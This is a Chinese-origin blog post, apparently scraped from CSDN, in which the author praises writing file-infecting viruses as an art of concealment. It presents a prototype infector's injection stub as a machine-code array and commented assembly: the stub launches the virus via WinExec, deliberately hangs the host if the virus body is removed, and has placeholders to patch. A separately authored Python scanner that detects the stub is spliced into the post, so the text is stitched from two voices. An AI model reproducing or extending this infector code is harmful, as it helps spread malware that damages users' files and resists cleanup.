About infectious viruses (1)

Source: Internet
Author: User
Tags: 0xc0

In my opinion, infectious (file-infecting) viruses are the ones that really deserve the name virus, because they are hard to remove by hand. In college, the most annoying thing about helping people remove viruses was running into a file infector: unless you write a program to process the files automatically, manual cleanup is quite troublesome. Of course, what I call a "real" virus mainly reflects my view that a virus which can easily be removed by hand is not a good virus. Virus writers chase a fast propagation speed while ignoring the virus's "stubbornness". A Trojan that simply uses a startup registry key is obviously far too convenient to clean up: you can just delete the registry key in safe mode, and the virus body itself can then be ignored.

With deeper research into the PE format and the development of high-level languages, writing infectious viruses is no longer limited to assembly; high-level languages such as VC can also do it, the disadvantage being that the compiled virus is too large. At the current hardware level, people no longer care about 10+ KB of space. However, virus writing is an art, and that art is concealment. A short injection of about 100 bytes reflects this art: it takes advantage of gaps in the program itself without increasing the program's length. Of course, the limit on code length inevitably reduces what the injected code can do. A week ago I wrote a prototype of an infectious virus; writing it down here is a review.

Injection infection:

Because the PE program itself has no spare space, only the startup code of the virus file is injected when the PE file is infected, which saves most of the space. If the virus body is removed, the injected stub makes its presence known by breaking the host program's execution.

 

unsigned char injectcode[] = {
    0x68, 0x44, 0x33, 0x22, 0x11, 0x33, 0xc0, 0x64,
    0xff, 0x30, 0x64, 0x89, 0x20, 0x50, 0x68, 0x44,
    0x33, 0x22, 0x11, 0xb8, 0x44, 0x33, 0x22, 0x11,
    0xff, 0xd0, 0x3c, 0x02, 0x74, 0x1e, 0x33, 0xc0,
    0x64, 0x8f, 0x00, 0x5a, 0x68, 0x44, 0x33, 0x22,
    0x11, 0xc3, 0x68, 0x44, 0x33, 0x22, 0x11, 0x8b,
    0x44, 0x24, 0x0a, 0x8f, 0x80, 0xb8, 0x00, 0x00,
    0x00, 0x33, 0xc0, 0xc3, 0xeb, 0xfe
};
/**************************************************
injectcode[] =
__asm
{
    push 11223344h              ; install SEH (handler address)
    xor eax, eax
    push dword ptr fs:[eax]
    mov dword ptr fs:[eax], esp
    push eax                    ; uCmdShow
    push 11223344h              ; lpCmdLine
    mov eax, 11223344h          ; offset of WinExec
    call eax                    ; call WinExec
    cmp al, 2                   ; determine whether the virus file exists
    je label                    ; if not, jump to the endless loop
    xor eax, eax                ; uninstall SEH
    pop dword ptr fs:[eax]
    pop edx
    push 11223344h              ; host program's original OEP
    retn
    push 11223344h              ; SEH exception handler
    mov eax, dword ptr [esp + 10]
    pop dword ptr [eax + 0b8h]  ; store the host OEP as the safe return address
    xor eax, eax
    retn
label:
    jmp label                   ; jump to self (0xebfe)
}
**************************************************/

 

 

The injected code is the machine code corresponding to the assembly in the __asm block shown in the comment.

The injected code runs as follows: install SEH -> call WinExec() -> check whether the launch succeeded -> if it failed, enter an endless loop; if it succeeded, return to the host program's original entry point.

SEH is installed mainly to keep the program robust after injection and infection, because the WinExec() address is hard-coded: if the system changes, an exception is likely, and with SEH installed an exception returns execution to the host code. 11223344h is a placeholder address that must be replaced with the corresponding real address. WinExec is used here instead of CreateProcess because the latter has too many parameters; WinExec ultimately calls CreateProcess itself, but takes only two parameters, saving more than 10 bytes. Because SEH is installed, an exception inside WinExec is not a concern.

With the injection code above, what remains before infection is to collect the necessary address information and fill in the placeholders in the injection code.
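As an added, defender-side example (my code, not from the original post): a Python scanner that turns the 62-byte stub listed above into a masked signature, wildcards its five 11223344h placeholders, and reports each occurrence in a file together with the five immediates it was patched with, which is the information a cleanup routine needs (the post's comments identify the fourth as the host's original OEP). The sample buffer is constructed; PLACEHOLDER, build_pattern and find_stub are names I chose.

```python
import re
import struct

# Stub bytes exactly as listed in the post; each 44 33 22 11 run is a 11223344h placeholder.
STUB = bytes([
    0x68, 0x44, 0x33, 0x22, 0x11, 0x33, 0xc0, 0x64,
    0xff, 0x30, 0x64, 0x89, 0x20, 0x50, 0x68, 0x44,
    0x33, 0x22, 0x11, 0xb8, 0x44, 0x33, 0x22, 0x11,
    0xff, 0xd0, 0x3c, 0x02, 0x74, 0x1e, 0x33, 0xc0,
    0x64, 0x8f, 0x00, 0x5a, 0x68, 0x44, 0x33, 0x22,
    0x11, 0xc3, 0x68, 0x44, 0x33, 0x22, 0x11, 0x8b,
    0x44, 0x24, 0x0a, 0x8f, 0x80, 0xb8, 0x00, 0x00,
    0x00, 0x33, 0xc0, 0xc3, 0xeb, 0xfe,
])
PLACEHOLDER = struct.pack("<I", 0x11223344)  # little-endian 44 33 22 11

def build_pattern(stub, placeholder):
    """Compile a masked signature: fixed opcode bytes match literally, each
    placeholder imm32 becomes a 4-byte capture group that matches any value."""
    parts, slots, i = [], [], 0
    while i < len(stub):
        if stub[i:i + 4] == placeholder:
            parts.append(b"(.{4})")
            slots.append(i)
            i += 4
        else:
            parts.append(re.escape(stub[i:i + 1]))
            i += 1
    return re.compile(b"".join(parts), re.DOTALL), slots

STUB_PATTERN, SLOTS = build_pattern(STUB, PLACEHOLDER)

def find_stub(data):
    """Return every occurrence of the stub in data with its file offset and the five
    immediates it was patched with (SEH handler, lpCmdLine, WinExec address, host OEP, host OEP)."""
    hits = []
    for m in STUB_PATTERN.finditer(data):
        imms = [struct.unpack("<I", g)[0] for g in m.groups()]
        hits.append({"offset": m.start(), "imm32": imms})
    return hits

# Constructed sample: padding around a copy of the stub whose placeholders were
# replaced by an arbitrary value, standing in for an infected file on disk.
SAMPLE = b"\x90" * 7 + STUB.replace(PLACEHOLDER, struct.pack("<I", 0x12345678)) + b"\xcc" * 5

if __name__ == "__main__":
    for hit in find_stub(SAMPLE):
        print("stub at offset %d, imm32 = %s" % (hit["offset"], [hex(v) for v in hit["imm32"]]))
```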

 

This article from the csdn blog, reproduced please indicate the source: http://blog.csdn.net/GaA_Ra/archive/2010/06/27/5697579.aspx
